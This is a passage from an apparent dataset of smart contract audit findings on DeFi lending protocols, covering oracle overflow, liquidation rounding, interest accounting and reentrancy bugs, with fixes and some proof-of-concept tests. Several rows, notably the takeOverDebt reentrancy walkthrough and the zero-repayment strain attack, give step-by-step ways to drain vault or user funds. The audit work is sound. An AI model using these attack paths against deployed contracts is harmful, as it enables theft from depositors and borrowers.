no way to provide ""negative liquidity"" or ""short a liquidity position"".\\nIn fact the linked article by Lambert Guillaume contains data which demonstrates this exact fact - the table which shows the derived IV at time of writing having far lower results than the historical volatilities and the the IV derived from markets that allow both long and short trading (like options exchanges such as Deribit).\\nHere is a quote from that exact article, which points out that the Uniswap derived IV is sometimes 2.5x lower. Also check out the table directly in the article for reference:\\n```\\n""The realized volatility of most assets hover between 75% and 200% annualized in ETH terms. If we compare this to the IV extracted from the Uniswap v3 pools, we get:\\n\\nNote that the volatilities are somewhat lower, perhaps a factor of ~2.5, for most assets.""\\n```\\n\\nThe `IV's` in options markets or protocols that have long-short mechanisms such as Opyn's Squeeth have a correction mechanism for `IV's` which are too low, because you can both buy and sell options, and are therefore ""correct"" according to Efficient Market Hypothesis. The Uniswap pool is a ""long-only"" market, where liquidity can be added, but not shorted, which leads to systematically lower `IV` than is realistic. The EMH model, both in soft and hard form, only holds when there is a mechnaism for a rational minority to profit off correcting a market imbalance. If many irrational or utilitarian users deposits too much liquidity into a Uniswap v3 pool relative to the fee capture and `IV`, theres no way to profit off correcting this imbalance.\\nThere are 3 ways to validate the claim that the Uniswap formula drastically underestimates the IV:\\nOn chain data which shows that the liquidty and fee derivation from Uniswap gives far lower results than other\\nThe table provided in Lambert Guillaume's article, which shows a Uniswap pool derived IVs which are far lower than the historical volatilities of the asset.\\nStudies showing that liquidity providers suffer far more impermanent loss than fees.","2 possible options (excuse the pun):\\nUse historical price differences in the Uniswap pool (similar to a TWAP, but Time Weighted Average Price Difference) and use that to infer volatilty alongside the current implementations which is based on fees and liquidity. Both are inaccurate, but use the `maximum` of the two values. The 2 `IV` calculations can be used to ""sanity check"" the other, to correct one which drastically underestimates the risk\\nSame as above, use the `maximum` of the fee/liquidity derived `IV` but use a market that has long/short possibilities such as Opyn's Squeeth to sanity check the `IV`.","The lower `IV` increases LTV, which means far higher LTV for risky assets. `5 sigma` probability bad-debt events, as calculated by the protocol which is basically an impossibility, becomes possible/likely as the relationship between `IV` or `Pr(event)` is super-linear","```\\n""The realized volatility of most assets hover between 75% and 200% annualized in ETH terms. If we compare this to the IV extracted from the Uniswap v3 pools, we get:\\n\\nNote that the volatilities are somewhat lower, perhaps a factor of ~2.5, for most assets.""\\n```\\n" +Bad debt liquidation doesn't allow liquidator to receive its ETH bonus (ante),medium,"More detailed scenario\\nAlice account goes into bad debt for whatever reason. For example, the account has 150 DAI borrowed, but only 100 DAI assets.\\nBob tries to `liquidate` Alice account, but his transaction reverts, because remaining DAI liability after repaying 100 DAI assets Alice has, will be 50 DAI bad debt. `liquidate` code will try to call Bob's callee contract to swap 0.03 WETH to 50 DAI sending it 0.03 WETH. However, since Alice account has 0 WETH, the transfer will revert.\\nBob tries to work around the liquidation problem: 3.1. Bob calls `liquidate` with `strain` set to `type(uint256).max`. Liquidation succeeds, but Bob doesn't receive anything for his liquidation (he receives 0 ETH bonus). Alice's ante is stuck in the contract until Alice bad debt is fully repaid. 3.2. Bob sends 0.03 WETH directly to Alice account and calls `liquidate` normally. It succeeds and Bob gets his bonus for liquidation (0.01 ETH). He has 0.02 ETH net loss from liquidaiton (in addition to gas fees).\\nIn both cases there is no incentive for Bob to liquidate Alice. So it's likely Alice account won't be liquidated and a borrow of 150 will be stuck in Alice account for a long time. Some lender depositors who can't withdraw might still have incentive to liquidate Alice to be able to withdraw from lender, but Alice's ante will still be stuck in the contract.\\nThe scenario above is demonstrated in the test, add it to test/Liquidator.t.sol:\\n```\\n function test_badDebtLiquidationAnte() public {\\n\\n // malicious user borrows at max leverage + some safety margin\\n uint256 margin0 = 1e18;\\n uint256 borrows0 = 100e18;\\n\\n deal(address(asset0), address(account), margin0);\\n\\n bytes memory data = abi.encode(Action.BORROW, borrows0, 0);\\n account.modify(this, data, (1 << 32));\\n\\n // borrow increased by 50%\\n _setInterest(lender0, 15000);\\n\\n emit log_named_uint(""User borrow:"", lender0.borrowBalance(address(account)));\\n emit log_named_uint(""User assets:"", asset0.balanceOf(address(account)));\\n\\n // warn account\\n account.warn((1 << 32));\\n\\n // skip warning time\\n skip(LIQUIDATION_GRACE_PERIOD);\\n lender0.accrueInterest();\\n\\n // liquidation reverts because it requires asset the account doesn't have to swap\\n vm.expectRevert();\\n account.liquidate(this, bytes(""""), 1, (1 << 32));\\n\\n // liquidate with max strain to avoid revert when trying to swap assets account doesn't have\\n account.liquidate(this, bytes(""""), type(uint256).max, (1 << 32));\\n\\n emit log_named_uint(""Liquidated User borrow:"", lender0.borrowBalance(address(account)));\\n emit log_named_uint(""Liquidated User assets:"", asset0.balanceOf(address(account)));\\n emit log_named_uint(""Liquidated User ante:"", address(account).balance);\\n }\\n```\\n\\nExecution console log:\\n```\\n User borrow:: 150000000000000000000\\n User assets:: 101000000000000000000\\n Liquidated User borrow:: 49000000162000000001\\n Liquidated User assets:: 0\\n Liquidated User ante:: 10000000000000001\\n```\\n","Consider verifying the bad debt situation and not forcing swap which will fail, so that liquidation can repay whatever assets account still has and give liquidator its full bonus.","Liquidators are not compensated for bad debt liquidations in some cases. Ante (liquidator bonus) is stuck in the borrower smart contract until bad debt is repaid. There is not enough incentive to liquidate such bad debt accounts, which can lead for these accounts to accumulate even bigger bad debt and lender depositors being unable to withdraw their funds from lender.","```\\n function test_badDebtLiquidationAnte() public {\\n\\n // malicious user borrows at max leverage + some safety margin\\n uint256 margin0 = 1e18;\\n uint256 borrows0 = 100e18;\\n\\n deal(address(asset0), address(account), margin0);\\n\\n bytes memory data = abi.encode(Action.BORROW, borrows0, 0);\\n account.modify(this, data, (1 << 32));\\n\\n // borrow increased by 50%\\n _setInterest(lender0, 15000);\\n\\n emit log_named_uint(""User borrow:"", lender0.borrowBalance(address(account)));\\n emit log_named_uint(""User assets:"", asset0.balanceOf(address(account)));\\n\\n // warn account\\n account.warn((1 << 32));\\n\\n // skip warning time\\n skip(LIQUIDATION_GRACE_PERIOD);\\n lender0.accrueInterest();\\n\\n // liquidation reverts because it requires asset the account doesn't have to swap\\n vm.expectRevert();\\n account.liquidate(this, bytes(""""), 1, (1 << 32));\\n\\n // liquidate with max strain to avoid revert when trying to swap assets account doesn't have\\n account.liquidate(this, bytes(""""), type(uint256).max, (1 << 32));\\n\\n emit log_named_uint(""Liquidated User borrow:"", lender0.borrowBalance(address(account)));\\n emit log_named_uint(""Liquidated User assets:"", asset0.balanceOf(address(account)));\\n emit log_named_uint(""Liquidated User ante:"", address(account).balance);\\n }\\n```\\n" +Oracle.sol: observe function has overflow risk and should cast to uint256 like Uniswap V3 does,medium,"Looking at the `Oracle.observe` function, the `secondsPerLiquidityCumulativeX128` return value is calculated as follows:\\n```\\nliqCumL + uint160(((liqCumR - liqCumL) * delta) / denom)\\n```\\n\\nThe calculation is done in an `unchecked` block. `liqCumR` and `liqCumL` have type `uint160`.\\n`delta` and `denom` have type `uint56`.\\nLet's compare this to the Uniswap V3 code.\\n```\\nbeforeOrAt.secondsPerLiquidityCumulativeX128 +\\n uint160(\\n (uint256(\\n atOrAfter.secondsPerLiquidityCumulativeX128 - beforeOrAt.secondsPerLiquidityCumulativeX128\\n ) * targetDelta) / observationTimeDelta\\n )\\n```\\n\\nThe result of `atOrAfter.secondsPerLiquidityCumulativeX128 - beforeOrAt.secondsPerLiquidityCumulativeX128` is cast to `uint256`.\\nThat's because multiplying the result by `targetDelta` can overflow the `uint160` type.\\nThe maximum value of `uint160` is roughly `1.5e48`.\\n`delta` is simply the time difference between `timeL` and `target` in seconds.\\n```\\nsecondsPerLiquidityCumulativeX128: last.secondsPerLiquidityCumulativeX128 +\\n ((uint160(delta) << 128) / (liquidity > 0 ? liquidity : 1)),\\n```\\n\\nIf `liquidity` is very low and the time difference between observations is very big (hours to days), this can lead to the intermediate overflow in the `Oracle` library, such that the `secondsPerLiquidityCumulative` is much smaller than it should be.\\nThe lowest value for the above division is `1`. In that case the accumulator grows by `2^128` (~3.4e38) every second.\\nIf observations are apart 24 hours (86400 seconds), this can lead to an overflow: Assume for simplicity `target - timeL = timeR - timeL`\\n```\\n(liqCumR - liqCumL) * delta = 3.4e38 * 86400 * 86400 > 1.5e48`\\n```\\n",Perform the same cast to `uint256` that Uniswap V3 performs:\\n```\\nliqCumL + uint160((uint256(liqCumR - liqCumL) * delta) / denom)\\n```\\n,"The corrupted return value affects the `Volatility` library. Specifically, the IV calculation.\\nThis can lead to wrong IV updates and LTV ratios that do not reflect the true IV, making the application more prone to bad debt or reducing capital efficiency.",```\\nliqCumL + uint160(((liqCumR - liqCumL) * delta) / denom)\\n```\\n +"The whole ante balance of a user with a very small loan, who is up for liquidation can be stolen without repaying the debt",medium,"Users face liquidation risk when their Borrower contract's collateral falls short of covering their loan. The `strain` parameter in the liquidation process enables liquidators to partially repay an unhealthy loan. Using a `strain` smaller than 1 results in the liquidator receiving a fraction of the user's collateral based on `collateral / strain`.\\nThe problem arises from the fact that the `strain` value is not capped, allowing for a potentially harmful scenario. For instance, a user with an unhealthy loan worth $0.30 in a WBTC (8-decimal token) vault on Arbitrum (with very low gas costs) has $50 worth of ETH (with a price of $1500) as collateral in their Borrower contract. A malicious liquidator spots the unhealthy loan and submits a liquidation transaction with a `strain` value of 1e3 + 1. Since the `strain` exceeds the loan value, the liquidator's repayment amount gets rounded down to 0, effectively allowing them to claim the collateral with only the cost of gas.\\n```\\nassembly (""memory-safe"") {\\n // // rest of code\\n liabilities0 := div(liabilities0, strain) // @audit rounds down to 0 <-\\n liabilities1 := div(liabilities1, strain) // @audit rounds down to 0 <-\\n // // rest of code\\n}\\n```\\n\\nFollowing this, the execution bypasses the `shouldSwap` if-case and proceeds directly to the following lines:\\n```\\n// @audit Won't be repaid in full since the loan is insolvent\\n_repay(repayable0, repayable1);\\nslot0 = (slot0_ & SLOT0_MASK_POSITIONS) | SLOT0_DIRT;\\n\\n// @audit will transfer the user 2e14 (0.5$)\\npayable(callee).transfer(address(this).balance / strain);\\nemit Liquidate(repayable0, repayable1, incentive1, priceX128);\\n```\\n\\nGiven the low gas price on Arbitrum, this transaction becomes profitable for the malicious liquidator, who can repeat it to drain the user's collateral without repaying the loan. This not only depletes the user's collateral but also leaves a small amount of bad debt on the market, potentially causing accounting issues for the vaults.","Consider implementing a check to determine whether the repayment impact is zero or not before transferring ETH to such liquidators.\\n```\\nrequire(repayable0 != 0 || repayable1 != 0, ""Zero repayment impact."") // @audit <-\\n_repay(repayable0, repayable1);\\n\\nslot0 = (slot0_ & SLOT0_MASK_POSITIONS) | SLOT0_DIRT;\\n\\npayable(callee).transfer(address(this).balance / strain);\\nemit Liquidate(repayable0, repayable1, incentive1, priceX128);\\n```\\n\\nAdditionally, contemplate setting a cap for the `strain` and potentially denoting it in basis points (BPS) instead of a fraction. This allows for more flexibility when users intend to repay a percentage lower than 100% but higher than 50% (e.g., 60%, 75%, etc.).","Users with small loans face the theft of their collateral without the bad debt being covered, leading to financial losses for the user. Additionally, this results in a potential amount of bad debt that can disrupt the vault's accounting.","```\\nassembly (""memory-safe"") {\\n // // rest of code\\n liabilities0 := div(liabilities0, strain) // @audit rounds down to 0 <-\\n liabilities1 := div(liabilities1, strain) // @audit rounds down to 0 <-\\n // // rest of code\\n}\\n```\\n" +Wrong auctionPrice used in calculating BPF to determine bond reward (or penalty),medium,"2.In _prepareTake() function,the BPF is calculated using vars.auctionPrice which is calculated by _auctionPrice() function.\\n```\\nfunction _prepareTake(\\n Liquidation memory liquidation_,\\n uint256 t0Debt_,\\n uint256 collateral_,\\n uint256 inflator_\\n ) internal view returns (TakeLocalVars memory vars) {\\n // rest of code// rest of code..\\n vars.auctionPrice = _auctionPrice(liquidation_.referencePrice, kickTime);\\n vars.bondFactor = liquidation_.bondFactor;\\n vars.bpf = _bpf(\\n vars.borrowerDebt,\\n collateral_,\\n neutralPrice,\\n liquidation_.bondFactor,\\n vars.auctionPrice\\n );\\n```\\n\\n3.The _takeBucket() function made a judgment after _prepareTake()\\n```\\n // cannot arb with a price lower than the auction price\\nif (vars_.auctionPrice > vars_.bucketPrice) revert AuctionPriceGtBucketPrice();\\n// if deposit take then price to use when calculating take is bucket price\\nif (params_.depositTake) vars_.auctionPrice = vars_.bucketPrice;\\n```\\n\\nso the root cause of this issue is that in a scenario where a user calls Deposit Take(params_.depositTake ==true) ,BPF will calculated base on vars_.auctionPrice instead of bucketPrice.\\n```\\n vars_ = _calculateTakeFlowsAndBondChange(\\n borrower_.collateral,\\n params_.inflator,\\n params_.collateralScale,\\n vars_\\n );\\n// rest of code// rest of code// rest of code// rest of code.\\n_rewardBucketTake(\\n auctions_,\\n deposits_,\\n buckets_,\\n liquidation,\\n params_.index,\\n params_.depositTake,\\n vars_\\n );\\n```\\n",In the case of Deposit Take calculate BPF using bucketPrice instead of auctionPrice .,"Wrong auctionPrice used in calculating BFP which subsequently influences the _calculateTakeFlowsAndBondChange() and _rewardBucketTake() function will result in bias .\\nFollowing the example of the Whitepaper(section 7.4.2 Deposit Take): BPF = 0.011644 * (1222.6515-1100 / 1222.6515-1050) = 0.008271889129 The collateral purchased is min{20, 20000/(1-0.00827) * 1100, 21000/(1-0.01248702772 )* 1100)} which is 18.3334 unit of ETH .Therefore, 18.3334 ETH are moved from the loan into the claimable collateral of bucket 1100, and the deposit is reduced to 0. Dave is awarded LPB in that bucket worth 18. 3334 · 1100 · 0. 008271889129 = 166. 8170374 𝐷𝐴𝐼. The debt repaid is 19914.99407 DAI\\n\\nBased on the current implementations: BPF = 0.011644 * (1222.6515-1071.77 / 1222.6515-1050) = 0.010175. TPF = 5/4*0.011644 - 1/4 *0.010175 = 0.01201125. The collateral purchased is 18.368 unit of ETH. The debt repaid is 20000 * (1-0.01201125) / (1-0.010175) = 19962.8974DAI Dave is awarded LPB in that bucket worth 18. 368 · 1100 · 0. 010175 = 205.58 𝐷𝐴𝐼.\\nSo,Dave earn more rewards(38.703 DAI) than he should have.\\nAs the Whitepaper says: "" the caller would typically have other motivations. She might have called it because she is Carol, who wanted to buy the ETH but not add additional DAI to the contract. She might be Bob, who is looking to get his debt repaid at the best price. She might be Alice, who is looking to avoid bad debt being pushed into the contract. She also might be Dave, who is looking to ensure a return on his liquidation bond.""","```\\nfunction _prepareTake(\\n Liquidation memory liquidation_,\\n uint256 t0Debt_,\\n uint256 collateral_,\\n uint256 inflator_\\n ) internal view returns (TakeLocalVars memory vars) {\\n // rest of code// rest of code..\\n vars.auctionPrice = _auctionPrice(liquidation_.referencePrice, kickTime);\\n vars.bondFactor = liquidation_.bondFactor;\\n vars.bpf = _bpf(\\n vars.borrowerDebt,\\n collateral_,\\n neutralPrice,\\n liquidation_.bondFactor,\\n vars.auctionPrice\\n );\\n```\\n" +Incorrect implementation of `BPF` leads to kicker losing rewards in a `take` action,medium,"The Bond Payment Factor (BPF) is the formula that determines the reward/penalty over the bond of a kicker in each `take` action. According to the whitepaper, the formula is described as:\\n```\\n// If TP < NP\\nBPF = bondFactor * min(1, max(-1, (NP - price) / (NP - TP)))\\n\\n// If TP >= NP\\nBPF = bondFactor (if price <= NP)\\nBPF = -bondFactor (if price > NP)\\n```\\n\\n```\\nfunction _bpf(\\n uint256 debt_,\\n uint256 collateral_,\\n uint256 neutralPrice_,\\n uint256 bondFactor_,\\n uint256 auctionPrice_\\n) pure returns (int256) {\\n int256 thresholdPrice = int256(Maths.wdiv(debt_, collateral_));\\n\\n int256 sign;\\n if (thresholdPrice < int256(neutralPrice_)) {\\n // BPF = BondFactor * min(1, max(-1, (neutralPrice - price) / (neutralPrice - thresholdPrice)))\\n sign = Maths.minInt(\\n 1e18,\\n Maths.maxInt(\\n -1 * 1e18,\\n PRBMathSD59x18.div(\\n int256(neutralPrice_) - int256(auctionPrice_),\\n int256(neutralPrice_) - thresholdPrice\\n )\\n )\\n );\\n } else {\\n int256 val = int256(neutralPrice_) - int256(auctionPrice_);\\n if (val < 0 ) sign = -1e18;\\n else if (val != 0) sign = 1e18; // @audit Sign will be zero when NP = auctionPrice\\n }\\n\\n return PRBMathSD59x18.mul(int256(bondFactor_), sign);\\n}\\n```\\n\\nThe issue is that the implementation of the `BPF` formula in the code doesn't match the specification, leading to the loss of rewards in that `take` action in cases where `TP >= NP` and `price = NP`.\\nAs showed in the above snippet, in cases where `TP >= NP` and `NP = price` (thus val = 0) the function won't set a value for `sign` (will be `0` by default) so that will result in a computed `BPF` of `0`, instead of `bondFactor` that would be the correct `BPF`.","Change the `_bpf` function to match the specification in order to fairly distribute the rewards in a `take` action:\\n```\\nfunction _bpf(\\n uint256 debt_,\\n uint256 collateral_,\\n uint256 neutralPrice_,\\n uint256 bondFactor_,\\n uint256 auctionPrice_\\n) pure returns (int256) {\\n int256 thresholdPrice = int256(Maths.wdiv(debt_, collateral_));\\n\\n int256 sign;\\n if (thresholdPrice < int256(neutralPrice_)) {\\n // BPF = BondFactor * min(1, max(// Remove the line below\\n1, (neutralPrice // Remove the line below\\n price) / (neutralPrice // Remove the line below\\n thresholdPrice)))\\n sign = Maths.minInt(\\n 1e18,\\n Maths.maxInt(\\n // Remove the line below\\n1 * 1e18,\\n PRBMathSD59x18.div(\\n int256(neutralPrice_) // Remove the line below\\n int256(auctionPrice_),\\n int256(neutralPrice_) // Remove the line below\\n thresholdPrice\\n )\\n )\\n );\\n } else {\\n int256 val = int256(neutralPrice_) // Remove the line below\\n int256(auctionPrice_);\\n if (val < 0 ) sign = // Remove the line below\\n1e18;\\n// Remove the line below\\n else if (val != 0) sign = 1e18;\\n// Add the line below\\n else sign = 1e18;\\n }\\n\\n return PRBMathSD59x18.mul(int256(bondFactor_), sign);\\n}\\n```\\n","The kicker will lose the rewards in that `take` action if the previous conditions are satisfied.\\nWhile the probability of this conditions to be met is not usual, the impact is the loss of rewards for that kicker and that may cause to lose part of the bond if later a `take` is performed with a negative `BPF`.","```\\n// If TP < NP\\nBPF = bondFactor * min(1, max(-1, (NP - price) / (NP - TP)))\\n\\n// If TP >= NP\\nBPF = bondFactor (if price <= NP)\\nBPF = -bondFactor (if price > NP)\\n```\\n" +First pool borrower pays extra interest,medium,"For any function in which the current interest rate is important in a pool, we compute interest updates by accruing with `_accruePoolInterest` at the start of the function, then execute the main logic, then update the interest state accordingly with `_updateInterestState`. See below a simplified example for ERC20Pool.drawDebt:\\n```\\nfunction drawDebt(\\n address borrowerAddress_,\\n uint256 amountToBorrow_,\\n uint256 limitIndex_,\\n uint256 collateralToPledge_\\n) external nonReentrant {\\n PoolState memory poolState = _accruePoolInterest();\\n\\n // rest of code\\n\\n DrawDebtResult memory result = BorrowerActions.drawDebt(\\n auctions,\\n deposits,\\n loans,\\n poolState,\\n _availableQuoteToken(),\\n borrowerAddress_,\\n amountToBorrow_,\\n limitIndex_,\\n collateralToPledge_\\n );\\n\\n // rest of code\\n\\n // update pool interest rate state\\n _updateInterestState(poolState, result.newLup);\\n\\n // rest of code\\n}\\n```\\n\\nWhen accruing interest in `_accruePoolInterest`, we only update the state if `poolState_.t0Debt != 0`. Most notably, we don't set `poolState_.isNewInterestAccrued`. See below simplified logic from _accruePoolInterest:\\n```\\n// check if t0Debt is not equal to 0, indicating that there is debt to be tracked for the pool\\nif (poolState_.t0Debt != 0) {\\n // rest of code\\n\\n // calculate elapsed time since inflator was last updated\\n uint256 elapsed = block.timestamp - inflatorState.inflatorUpdate;\\n\\n // set isNewInterestAccrued field to true if elapsed time is not 0, indicating that new interest may have accrued\\n poolState_.isNewInterestAccrued = elapsed != 0;\\n\\n // rest of code\\n}\\n```\\n\\nOf course before we actually update the state from the first borrow, the debt of the pool is 0, and recall that `_accruePoolInterest` runs before the main state changing logic of the function in `BorrowerActions.drawDebt`.\\nAfter executing the main state changing logic in `BorrowerActions.drawDebt`, where we update state, including incrementing the pool and borrower debt as expected, we run the logic in `_updateInterestState`. Here we update the inflator if either `poolState_.isNewInterestAccrued` or `poolState_.debt == 0`.\\n```\\n// update pool inflator\\nif (poolState_.isNewInterestAccrued) {\\n inflatorState.inflator = uint208(poolState_.inflator);\\n inflatorState.inflatorUpdate = uint48(block.timestamp);\\n// if the debt in the current pool state is 0, also update the inflator and inflatorUpdate fields in inflatorState\\n// slither-disable-next-line incorrect-equality\\n} else if (poolState_.debt == 0) {\\n inflatorState.inflator = uint208(Maths.WAD);\\n inflatorState.inflatorUpdate = uint48(block.timestamp);\\n}\\n```\\n\\nThe problem here is that since there was no debt at the start of the function, `poolState_.isNewInterestAccrued` is false and since there is debt now at the end of the function, `poolState_.debt == 0` is also false. As a result, the inflator is not updated. Updating the inflator here is paramount since it effectively marks a starting time at which interest accrues on the borrowers debt. Since we don't update the inflator, the borrowers debt effectively started accruing interest at the time of the last inflator update, which is an arbitrary duration.\\nWe can prove this vulnerability by modifying `ERC20PoolBorrow.t.sol:testPoolBorrowAndRepay` to skip 100 days before initially drawing debt:\\n```\\nfunction testPoolBorrowAndRepay() external tearDown {\\n // check balances before borrow\\n assertEq(_quote.balanceOf(address(_pool)), 50_000 * 1e18);\\n assertEq(_quote.balanceOf(_lender), 150_000 * 1e18);\\n\\n // @audit skip 100 days to break test\\n skip(100 days);\\n\\n _drawDebt({\\n from: _borrower,\\n borrower: _borrower,\\n amountToBorrow: 21_000 * 1e18,\\n limitIndex: 3_000,\\n collateralToPledge: 100 * 1e18,\\n newLup: 2_981.007422784467321543 * 1e18\\n });\\n\\n // rest of code\\n}\\n```\\n\\nUnlike the result without skipping time before drawing debt, the test fails with output logs being off by amounts roughly corresponding to the unexpected interest.","Issue First pool borrower pays extra interest\\nWhen checking whether the debt of the pool is 0 to determine whether to reset the inflator, it should not only check whether the debt is 0 at the end of execution, but also whether the debt was 0 before execution. To do so, we should cache the debt at the start of the function and modify the `_updateInterestState` logic to be something like:\\n```\\n// update pool inflator\\nif (poolState_.isNewInterestAccrued) {\\n inflatorState.inflator = uint208(poolState_.inflator);\\n inflatorState.inflatorUpdate = uint48(block.timestamp);\\n// if the debt in the current pool state is 0, also update the inflator and inflatorUpdate fields in inflatorState\\n// slither-disable-next-line incorrect-equality\\n// @audit reset inflator if no debt before execution\\n} else if (poolState_.debt == 0 || debtBeforeExecution == 0) {\\n inflatorState.inflator = uint208(Maths.WAD);\\n inflatorState.inflatorUpdate = uint48(block.timestamp);\\n}\\n```\\n","First borrower always pays extra interest, with losses depending upon time between adding liquidity and drawing debt and amount of debt drawn.\\nNote also that there's an attack vector here in which the liquidity provider can intentionally create and fund the pool a long time before announcing it, causing the initial borrower to lose a significant amount to interest.","```\\nfunction drawDebt(\\n address borrowerAddress_,\\n uint256 amountToBorrow_,\\n uint256 limitIndex_,\\n uint256 collateralToPledge_\\n) external nonReentrant {\\n PoolState memory poolState = _accruePoolInterest();\\n\\n // rest of code\\n\\n DrawDebtResult memory result = BorrowerActions.drawDebt(\\n auctions,\\n deposits,\\n loans,\\n poolState,\\n _availableQuoteToken(),\\n borrowerAddress_,\\n amountToBorrow_,\\n limitIndex_,\\n collateralToPledge_\\n );\\n\\n // rest of code\\n\\n // update pool interest rate state\\n _updateInterestState(poolState, result.newLup);\\n\\n // rest of code\\n}\\n```\\n" +Function `_indexOf` will cause a settlement to revert if `auctionPrice > MAX_PRICE`,medium,"In ERC721 pools, when a settlement occurs and the borrower still have some fraction of collateral, that fraction is allocated in the bucket with a price closest to `auctionPrice` and the borrower is proportionally compensated with LPB in that bucket.\\nIn order to calculate the index of the bucket closest in price to `auctionPrice`, the `_indexOf` function is called. The first line of that function is outlined below:\\n```\\nif (price_ < MIN_PRICE || price_ > MAX_PRICE) revert BucketPriceOutOfBounds();\\n```\\n\\nThe `_indexOf` function will revert if `price_` (provided as an argument) is below `MIN_PRICE` or above `MAX_PRICE`. This function is called from `_settleAuction`, here is a snippet of that:\\n```\\nfunction _settleAuction(\\n AuctionsState storage auctions_,\\n mapping(uint256 => Bucket) storage buckets_,\\n DepositsState storage deposits_,\\n address borrowerAddress_,\\n uint256 borrowerCollateral_,\\n uint256 poolType_\\n) internal returns (uint256 remainingCollateral_, uint256 compensatedCollateral_) {\\n\\n // // rest of code\\n\\n uint256 auctionPrice = _auctionPrice(\\n auctions_.liquidations[borrowerAddress_].referencePrice,\\n auctions_.liquidations[borrowerAddress_].kickTime\\n );\\n\\n // determine the bucket index to compensate fractional collateral\\n> bucketIndex = auctionPrice > MIN_PRICE ? _indexOf(auctionPrice) : MAX_FENWICK_INDEX;\\n\\n // // rest of code\\n}\\n```\\n\\nThe `_settleAuction` function first calculates the `auctionPrice` and then it gets the index of the bucket with a price closest to `bucketPrice`. If `auctionPrice` results to be bigger than `MAX_PRICE`, then the `_indexOf` function will revert and the entire settlement will fail.\\nIn certain types of pools where one asset has an extremely low market price and the other is valued really high, the resulting prices at an auction can be so high that is not rare to see an `auctionPrice > MAX_PRICE`.\\nThe `auctionPrice` variable is computed from `referencePrice` and it goes lower through time until 72 hours have passed. Also, `referencePrice` can be much higher than `MAX_PRICE`, as outline in _kick:\\n```\\nvars.referencePrice = Maths.min(Maths.max(vars.htp, vars.neutralPrice), MAX_INFLATED_PRICE);\\n```\\n\\nThe value of `MAX_INFLATED_PRICE` is exactly 50 * `MAX_PRICE` so a `referencePrice` bigger than `MAX_PRICE` is totally possible.\\nIn auctions where `referencePrice` is bigger than `MAX_PRICE` and the auction is settled in a low time frame, `auctionPrice` will be also bigger than `MAX_PRICE` and that will cause the entire transaction to revert.",It's recommended to change the affected line of `_settleAuction` in the following way:\\n```\\n// Remove the line below\\n bucketIndex = auctionPrice > MIN_PRICE ? _indexOf(auctionPrice) : MAX_FENWICK_INDEX;\\n// Add the line below\\n if(auctionPrice < MIN_PRICE){\\n// Add the line below\\n bucketIndex = MAX_FENWICK_INDEX;\\n// Add the line below\\n } else if (auctionPrice > MAX_PRICE) {\\n// Add the line below\\n bucketIndex = 1;\\n// Add the line below\\n } else {\\n// Add the line below\\n bucketIndex = _indexOf(auctionPrice);\\n// Add the line below\\n }\\n```\\n,"When the above conditions are met, the auction won't be able to settle until `auctionPrice` lowers below `MAX_PRICE`.\\nIn ERC721 pools with a high difference in assets valuation, there is no low-probability prerequisites and the impact will be a violation of the system design, as well as the potential losses for the kicker of that auction, so setting severity to be high",```\\nif (price_ < MIN_PRICE || price_ > MAX_PRICE) revert BucketPriceOutOfBounds();\\n```\\n +Adversary can reenter takeOverDebt() during liquidation to steal vault funds,high,"First we'll walk through a high level breakdown of the issue to have as context for the rest of the report:\\nCreate a custom token that allows them to take control of the transaction and to prevent liquidation\\nFund UniV3 LP with target token and custom token\\nBorrow against LP with target token as the hold token\\nAfter some time the position become liquidatable\\nBegin liquidating the position via repay()\\nUtilize the custom token during the swap in repay() to gain control of the transaction\\nUse control to reenter into takeOverDebt() since it lack nonReentrant modifier\\nLoan is now open on a secondary address and closed on the initial one\\nTransaction resumes (post swap) on repay()\\nFinish repayment and refund all initial LP\\nPosition is still exists on new address\\nAfter some time the position become liquidatable\\nLoan is liquidated and attacker is paid more LP\\nVault is at a deficit due to refunding LP twice\\nRepeat until the vault is drained of target token\\nLiquidityManager.sol#L279-L287\\n```\\n_v3SwapExactInput(\\n v3SwapExactInputParams({\\n fee: params.fee,\\n tokenIn: cache.holdToken,\\n tokenOut: cache.saleToken,\\n amountIn: holdTokenAmountIn,\\n amountOutMinimum: (saleTokenAmountOut * params.slippageBP1000) /\\n Constants.BPS\\n })\\n```\\n\\nThe control transfer happens during the swap to UniV3. Here when the custom token is transferred, it gives control back to the attacker which can be used to call takeOverDebt().\\nLiquidityBorrowingManager.sol#L667-L672\\n```\\n _removeKeysAndClearStorage(borrowing.borrower, params.borrowingKey, loans);\\n // Pay a profit to a msg.sender\\n _pay(borrowing.holdToken, address(this), msg.sender, holdTokenBalance);\\n _pay(borrowing.saleToken, address(this), msg.sender, saleTokenBalance);\\n\\n emit Repay(borrowing.borrower, msg.sender, params.borrowingKey);\\n```\\n\\nThe reason the reentrancy works is because the actual borrowing storage state isn't modified until AFTER the control transfer. This means that the position state is fully intact for the takeOverDebt() call, allowing it to seamlessly transfer to another address behaving completely normally. After the repay() call resumes, _removeKeysAndClearStorage is called with the now deleted borrowKey.\\nKeys.sol#L31-L42\\n```\\nfunction removeKey(bytes32[] storage self, bytes32 key) internal {\\n uint256 length = self.length;\\n for (uint256 i; i < length; ) {\\n if (self.unsafeAccess(i).value == key) {\\n self.unsafeAccess(i).value = self.unsafeAccess(length - 1).value;\\n self.pop();\\n break;\\n }\\n unchecked {\\n ++i;\\n }\\n }\\n```\\n\\nThe unique characteristic of deleteKey is that it doesn't revert if the key doesn't exist. This allows ""removing"" keys from an empty array without reverting. This allows the repay call to finish successfully.\\nLiquidityBorrowingManager.sol#L450-L452\\n```\\n //newBorrowing.accLoanRatePerSeconds = oldBorrowing.accLoanRatePerSeconds;\\n _pay(oldBorrowing.holdToken, msg.sender, VAULT_ADDRESS, collateralAmt + feesDebt);\\n emit TakeOverDebt(oldBorrowing.borrower, msg.sender, borrowingKey, newBorrowingKey);\\n```\\n\\nNow we can see how this creates a deficit in the vault. When taking over an existing debt, the user is only required to provide enough hold token to cover any fee debt and any additional collateral to pay fees for the newly transferred position. This means that the user isn't providing any hold token to back existing LP.\\nLiquidityBorrowingManager.sol#L632-L636\\n```\\n Vault(VAULT_ADDRESS).transferToken(\\n borrowing.holdToken,\\n address(this),\\n borrowing.borrowedAmount + liquidationBonus\\n );\\n```\\n\\nOn the other hand repay transfers the LP backing funds from the vault. Since the same position is effectively liquidated twice, it will withdraw twice as much hold token as was originally deposited and no new LP funds are added when the position is taken over. This causes a deficit in the vault since other users funds are being withdrawn from the vault.",Add the `nonReentrant` modifier to `takeOverDebt()`,Vault can be drained,"```\\n_v3SwapExactInput(\\n v3SwapExactInputParams({\\n fee: params.fee,\\n tokenIn: cache.holdToken,\\n tokenOut: cache.saleToken,\\n amountIn: 